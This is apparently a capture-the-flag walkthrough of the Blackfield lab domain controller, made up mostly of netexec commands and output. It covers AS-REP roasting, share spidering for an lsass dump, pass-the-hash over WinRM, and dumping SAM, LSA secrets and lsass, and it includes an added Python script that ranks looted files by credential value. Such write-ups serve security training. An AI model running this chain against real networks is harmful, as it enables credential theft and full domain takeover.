Support:
- Getting domain info
netexec smb 10.10.10.192
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
- Anonymous logon
netexec smb 10.10.10.192 -u 'anonymous' -p ''
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\anonymous:
- Getting shares
netexec smb 10.10.10.192 -u 'anonymous' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\anonymous:
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share      Permissions  Remark
SMB 10.10.10.192 445 DC01 -----      -----------  ------
SMB 10.10.10.192 445 DC01 ADMIN$                  Remote Admin
SMB 10.10.10.192 445 DC01 C$                      Default share
SMB 10.10.10.192 445 DC01 forensic                Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$       READ         Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON                Logon server share
SMB 10.10.10.192 445 DC01 profiles$  READ
SMB 10.10.10.192 445 DC01 SYSVOL                  Logon server share
- Getting list of files in shares
netexec smb 10.10.10.192 -u 'anonymous' -p '' -M spider_plus
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\anonymous:
SPIDER_P... 10.10.10.192 445 DC01 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192 445 DC01 [*] DIR: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192 445 DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192 445 DC01 [*] SIZE: 51200
SPIDER_P... 10.10.10.192 445 DC01 [*] OUTPUT: /tmp/nxc_spider_plus
# nothing readable, so the shares give us no usernames; the next step falls back to a username wordlist
cat /tmp/nxc_spider_plus/10.10.10.192.json
{
"profiles$": {}
}
- AS-REP Roast
netexec ldap 10.10.10.192 -u /tmp/wordlist -p '' --asreproast /tmp/kerberos.txt --kdc 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 support@BLACKFIELD.LOCAL:463841df869d5191fb527e7da2d7c1f3$63f60bc12dbf5e1244dadc984314b3fd513918c051e81e50943758de0fdb83d3f1ee51ede148bea256141d8c804de71fa88d17f03ec669fa1593652fc9363f81ac3cb735e0271a0a4569fe6094879e24abeb710cfd7844670d062967b46808242ea98b0868b53d7c818eddf27c2d7864c9c8dd1db8a938824c2614d53ee1d304390547cd019ca32a14aec5cd785255ed9fba039fea9e4652cfa277cc71c9796da94c3d3f346407b06db9db96e702e0061da735650c6c12e387ec67635662770f0309ea8a13fdb281c2f5b8c041795d0b763837a85ec8c5f6d2951b1d9b094575845fae5638148a41884b3e3b7aaa5acc6883ce62
- Access check (WinRM refuses support; LDAP and SMB accept the cracked password)
netexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight
netexec ldap 10.10.10.192 -u support -p '#00^BlackKnight' --kdc 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
netexec smb 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
netexec smb 10.10.10.192 -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share      Permissions  Remark
SMB 10.10.10.192 445 DC01 -----      -----------  ------
SMB 10.10.10.192 445 DC01 ADMIN$                  Remote Admin
SMB 10.10.10.192 445 DC01 C$                      Default share
SMB 10.10.10.192 445 DC01 forensic                Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$       READ         Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON   READ         Logon server share
SMB 10.10.10.192 445 DC01 profiles$  READ
SMB 10.10.10.192 445 DC01 SYSVOL     READ         Logon server share
- Kerberoasting
netexec ldap 10.10.10.192 -u support -p '#00^BlackKnight' --kerberoasting /tmp/kerbe --kdc 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.10.10.192 389 DC01 [-] No entries found!
- Shell as svc_backup (starts from the audit2020 account and the forensic share)
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:0xdf!!!
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:0xdf!!!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share      Permissions  Remark
SMB 10.10.10.192 445 DC01 -----      -----------  ------
SMB 10.10.10.192 445 DC01 ADMIN$                  Remote Admin
SMB 10.10.10.192 445 DC01 C$                      Default share
SMB 10.10.10.192 445 DC01 forensic   READ         Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$       READ         Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON   READ         Logon server share
SMB 10.10.10.192 445 DC01 profiles$  READ
SMB 10.10.10.192 445 DC01 SYSVOL     READ         Logon server share
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' -M spider_plus
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:0xdf!!!
SPIDER_P... 10.10.10.192 445 DC01 [*] Started spidering plus with option:
SPIDER_P... 10.10.10.192 445 DC01 [*] DIR: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192 445 DC01 [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.10.192 445 DC01 [*] SIZE: 51200
SPIDER_P... 10.10.10.192 445 DC01 [*] OUTPUT: /tmp/nxc_spider_plus
grep "memo" /tmp/nxc_spider_plus/10.10.10.192.json
"memory_analysis/RuntimeBroker.zip": {
"memory_analysis/ServerManager.zip": {
"memory_analysis/WmiPrvSE.zip": {
"memory_analysis/conhost.zip": {
"memory_analysis/ctfmon.zip": {
"memory_analysis/dfsrs.zip": {
"memory_analysis/dllhost.zip": {
"memory_analysis/ismserv.zip": {
"memory_analysis/lsass.zip": {
"memory_analysis/mmc.zip": {
"memory_analysis/sihost.zip": {
"memory_analysis/smartscreen.zip": {
"memory_analysis/svchost.zip": {
"memory_analysis/taskhostw.zip": {
"memory_analysis/winlogon.zip": {
"memory_analysis/wlms.zip": {
"tools/sleuthkit-4.8.0-win32/bin/api-ms-win-core-memory-l1-1-0.dll": {
# fetch memory_analysis/lsass.zip with smbclient, or download everything by re-running spider_plus with READ_ONLY=false (mind the SIZE cap)
netexec smb 10.10.10.192 -u audit2020 -p '0xdf!!!' -M spider_plus -o READ_ONLY=false
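Instead of grepping the spider_plus JSON by hand, the script below (an added example, not netexec code and not from the page's author) flattens the dump, converts the human-readable sizes back to bytes and ranks files by how much an attacker wants them, so the lsass dump comes out on top. It assumes the module's layout of share -> relative path -> metadata with a "size" string, as in the output above; the metadata key names and SAMPLE are constructed.

```python
"""Triage the JSON written by netexec's spider_plus module.

Added example, not part of netexec. Assumes the layout
share -> relative path -> {"size": "41.52 MB", ...}; SAMPLE is constructed
to mirror the forensic share listed on the page.
"""
import json
import re

UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3, "TB": 1024 ** 4}

# (regex, weight): a path scores the sum of the weights of every pattern it matches.
INTERESTING = [
    (r"lsass", 100),                           # LSASS memory: cached credentials
    (r"ntds\.dit", 100),                       # AD database
    (r"\.(dmp|dump)$", 60),                    # other process / crash dumps
    (r"\.(kdbx|keytab|pfx|p12|pem|key)$", 80), # key material
    (r"(unattend|sysprep)\.xml$", 50),         # deployment answer files, often with passwords
    (r"\.(ps1|bat|vbs|config|ini|xml|txt)$", 20),
    (r"\.zip$", 10),
]


def parse_size(text):
    """'41.52 MB' -> 43536875 bytes; anything unparseable -> 0."""
    m = re.fullmatch(r"\s*([\d.]+)\s*([KMGT]?B)\s*", str(text), re.I)
    if not m:
        return 0
    return int(float(m.group(1)) * UNITS[m.group(2).upper()])


def score(path):
    return sum(w for pat, w in INTERESTING if re.search(pat, path, re.I))


def triage(spider_json, min_score=1, max_bytes=None):
    """Return [(score, share, path, size_bytes)] sorted most interesting first.

    max_bytes mirrors the module's own size cap (the SIZE value it logs is in KB,
    51200 on the page, i.e. 50 MB): pass it to see what a default run would skip.
    """
    data = json.loads(spider_json) if isinstance(spider_json, str) else spider_json
    rows = []
    for share, files in data.items():
        for path, meta in files.items():
            size = parse_size(meta.get("size", "0 B"))
            sc = score(path)
            if sc >= min_score and (max_bytes is None or size <= max_bytes):
                rows.append((sc, share, path, size))
    rows.sort(key=lambda r: (-r[0], -r[3], r[1], r[2]))
    return rows


# Constructed sample in the module's format (values are made up).
SAMPLE = """{
  "profiles$": {},
  "forensic": {
    "memory_analysis/lsass.zip": {"size": "41.52 MB"},
    "memory_analysis/svchost.zip": {"size": "3.21 MB"},
    "tools/sleuthkit-4.8.0-win32/bin/api-ms-win-core-memory-l1-1-0.dll": {"size": "18.6 KB"},
    "notes/readme.txt": {"size": "1.02 KB"}
  }
}"""

if __name__ == "__main__":
    for sc, share, path, size in triage(SAMPLE):
        print(f"{sc:4d}  {size:>12,d}  {share}/{path}")
```

Point it at /tmp/nxc_spider_plus/<ip>.json and the lsass archive is the first row; run it with `max_bytes=50 * 1024 ** 2` to see which large files a default spider_plus run would not have downloaded.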
- Shell over WinRM (pass-the-hash with the svc_backup NT hash recovered from the lsass dump; check SMB first, then WinRM)
netexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup 9658d1d1dcd9250115e2205d9f48400d
netexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
netexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -x 'whoami;hostname'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
WINRM 10.10.10.192 5985 DC01 [+] Executed command
WINRM 10.10.10.192 5985 DC01 blackfield\svc_backup
DC01
- For fun and profit
sam
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --sam
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [+] Dumping SAM hashes
SMB 10.10.10.192 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
SMB 10.10.10.192 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.192 445 DC01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lsa
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --lsa
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [+] Dumping LSA secrets
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:aes256-cts-hmac-sha1-96:9a1cbed11eac98cd2382509615cafd99f9ead2cc2e48352e269d5a05d50652bd
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:aes128-cts-hmac-sha1-96:6e4e93262b357cf298c60538d6373f26
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:des-cbc-md5:45d6dacdd57a07df
SMB 10.10.10.192 445 DC01 BLACKFIELD\DC01$:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
SMB 10.10.10.192 445 DC01 BLACKFIELD\Administrator:###_ADM1N_3920_###
SMB 10.10.10.192 445 DC01 dpapi_machinekey:0xd4834e39bca0e657235935730c045b1b9934f690
dpapi_userkey:0x9fa187c3b866f3a77c651559633e2e120bc8ef6f
SMB 10.10.10.192 445 DC01 NL$KM:8801b205db707a0fef52df0696764ca4bd6e62d106631a7e312fa26df86c4250fc8d5ca4fc461bdc7eca7e767f5ec274cfebb61f998a29cf2cd11d55c6012e6f
lsass
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee -M lsassy
[-] Failed loading module at /usr/local/lib/python3.7/dist-packages/crackmapexec-5.1.0.dev0-py3.7.egg/cme/modules/slinky.py: No module named 'pylnk3'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
LSASSY 10.10.10.192 445 DC01 BLACKFIELD\Administrator 184fb5e5178480be64824d4cd53b99ee
LSASSY 10.10.10.192 445 DC01 BLACKFIELD.local\Administrator ###_ADM1N_3920_###
ntds
netexec smb 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee --ntds
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\administrator 184fb5e5178480be64824d4cd53b99ee (Pwn3d!)
SMB 10.10.10.192 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.192 445 DC01 [-] Could not connect: timed out
# I'm not the only one, puifff
secretsdump.py administrator:###_ADM1N_3920_###@10.10.10.192 -just-dc
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Enjoy netexec, and make sure you have the latest version!
Bye, @mpgn_x64